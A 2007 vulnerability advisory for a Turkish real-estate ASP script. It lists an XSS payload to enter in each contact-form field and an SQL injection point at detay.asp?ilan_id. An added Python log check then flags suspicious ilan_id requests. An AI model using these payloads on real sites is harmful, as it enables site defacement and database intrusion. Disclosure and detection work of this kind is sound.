
netkamp-sql.txt

Posted on 30 September 2007

Netkamp Emlak Scripti XSS & SQL Injection Vulnerability

#Software: Netkamp Emlak Scripti
#download: not free (350 YTL), sale: http://www.netkamp.com/net_emlak.asp
#demo: http://netemlak.netkamp.com/
#Found By: GeFORC3 ( G3 )

#Exploit & example:
-----------------------------------------------------------------------
#XSS:
http://www.site.com/script_path/iletisim.asp

Write XSS code into the script's text boxes. Example:

İletişim Formu (contact form)
Adınız: "><script>alert("G3");</script>
Soyadınız: "><script>alert("G3");</script>
E-Mail: "><script>alert("G3");</script>
Konu: "><script>alert("G3");</script>
Mesajınız: "><script>alert("G3");</script>

Press the "gönder" (send) button.
This XSS works on the contact page of the "Netkamp Emlak Scripti" script.
-----------------------------------------------------------------------
#SQL Injection:
http://www.site.com.com/script_path/detay.asp?ilan_id=[SQL]
-----------------------------------------------------
WwW.GeFORC3.ORG | WwW.HeykirBlog.Org | WwW.NetKaBus.CoM
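A log check a site operator could run for the detay.asp issue above, as an added example that is not part of the original advisory. It assumes ilan_id is normally a plain integer and that requests are logged in the IIS W3C field order shown; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumption: ilan_id (listing id) is a plain positive integer in normal use.
VALID_ID = re.compile(r"[0-9]{1,10}")

# Constructed sample in IIS W3C style (not taken from a real server).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2007-09-30 10:00:01 GET /emlak/detay.asp ilan_id=42 192.0.2.10 200
2007-09-30 10:00:05 GET /emlak/detay.asp ilan_id=42%27 192.0.2.11 500
2007-09-30 10:00:09 GET /emlak/DETAY.ASP ilan_id=7&ilan_id=abc 192.0.2.11 200
2007-09-30 10:00:12 GET /emlak/default.asp - 192.0.2.10 200
2007-09-30 10:00:15 GET /emlak/detay.asp - 192.0.2.12 200
"""


def flag_requests(log_text):
    """Return (client_ip, raw_query) for detay.asp hits whose ilan_id
    is missing, repeated, or not a plain integer after URL decoding."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue  # skip blank lines and W3C header directives
        parts = line.split()
        if len(parts) != 7:
            continue  # not in the assumed field layout
        _date, _time, _method, stem, query, ip, _status = parts
        # IIS paths are case-insensitive, so compare in lower case.
        if not stem.lower().endswith("/detay.asp"):
            continue
        raw = "" if query == "-" else query
        # Classic ASP treats parameter names case-insensitively.
        values = [v for k, v in parse_qsl(raw, keep_blank_values=True)
                  if k.lower() == "ilan_id"]
        if len(values) != 1 or not VALID_ID.fullmatch(values[0]):
            hits.append((ip, query))
    return hits


if __name__ == "__main__":
    for ip, query in flag_requests(SAMPLE_LOG):
        print(ip, query)
```

The same integer-only rule belongs in detay.asp itself as input validation, and the contact-form fields in iletisim.asp need HTML encoding on output; neither change is shown here.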

 
